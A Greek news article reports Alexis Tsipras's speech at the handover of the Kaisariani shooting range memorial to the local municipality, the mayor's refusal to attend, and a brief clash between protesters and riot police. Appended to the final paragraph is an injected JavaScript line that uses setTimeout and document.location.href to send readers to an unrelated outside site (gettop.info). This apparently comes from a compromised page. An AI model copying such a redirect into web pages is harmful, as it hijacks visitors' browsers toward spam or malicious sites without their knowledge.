Τσίπρας: Στο σκοπευτήριο της Καισαριανής κάποιοι θυσιάστηκαν για να είμαστε εμείς ελεύθεροι

0
10

 

Στην εκδήλωση που διοργάνωσε ο Πανελλαδικός Σύνδεσμος Αγωνιστών Εαμικής Εθνικής Αντίστασης, για την απόδοση του χώρου θυσίας του Σκοπευτηρίου Καισαριανής στον δήμο και τον λαό της περιοχής μίλησε ο πρωθυπουργός Αλέξης Τσίπρας σημειώνοντας: «Η σημερινή ημέρα έχει μια συναισθηματική φόρτιση. Παραδίδουμε τον χώρο στους κατοίκους της περιοχής, το σκοπευτήριο της Καισαριανής εδώ που κάποιοι θυσιάστηκαν για να είμαστε εμείς ελεύθεροι. Η ελληνική δημοκρατία τιμά και αναγνωρίζει αυτούς που της έδωσαν υπόσταση» και υπογράμμισε πως «τελεσίδικη είναι η καταδίκη του φασισμού στη συνείδηση μας»

«Η θυσία της πρωτομαγιάς του 1944 ήταν θυσία στο πλαίσιο τις εθνικής αντίστασης και μας κάνει όλους υπερήφανους» επεσήμανε ο πρωθυπουργός τονίζοντας πως η θυσία αυτή ανήκει σε κάθε Έλληνα αγωνιστή.

«Εμείς πρέπει να δείξουμε σαν φάρος δημοκρατίας τον ανθρωπισμό απέναντι στους πρόσφυγες που έρχονται κατατρεγμένοι στη χώρα μας.  Aπέναντι σε αυτούς που είχαν το θάρρος να κοιτάξουν την ιστορία στα μάτια κάνουμε το καθήκον μας και συνεχίζουμε στα βήματά τους».

«Για μένα είναι ιδιαίτερη τιμή να βρίσκομαι εδώ ως πρωθυπουργός και καλώ τους εκπροσώπους των δημοτικών παρατάξεων προκειμένου να τους παραδώσω το ΦΕΚ με το οποίο αποδίδεται το Σκοπευτήριο της Καισαριανής στον δήμο και στον λαό της» υπογράμμισε ο πρωθυπουργός.

Χθες, ο δήμαρχος Καισαριανής με επιστολή του τόνισε ότι δεν θα παρευρεθεί στην εκδήλωση καθώς το Σκοπευτήριο Καισαριανής αποκαταστάθηκε με τους αγώνες των δημοτών και δεν θέλει να αποδώσει την προσπάθεια στην κυβέρνηση.

Πριν αρχίσει την ομιλία του ο πρωθυπουργός σημειώθηκαν επεισόδια μικρής έντασης όταν ομάδα διαδηλωτών που βρίσκονταν έξω από το Σκοπευτήριο Καισαριανής προσπάθησαν να προσεγγίσουν τον χώρο ενώ δυνάμεις των ΜΑΤ τους εμπόδισαν και έκαναν και χρήση δακρυγόνων για τους απωθήσουν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here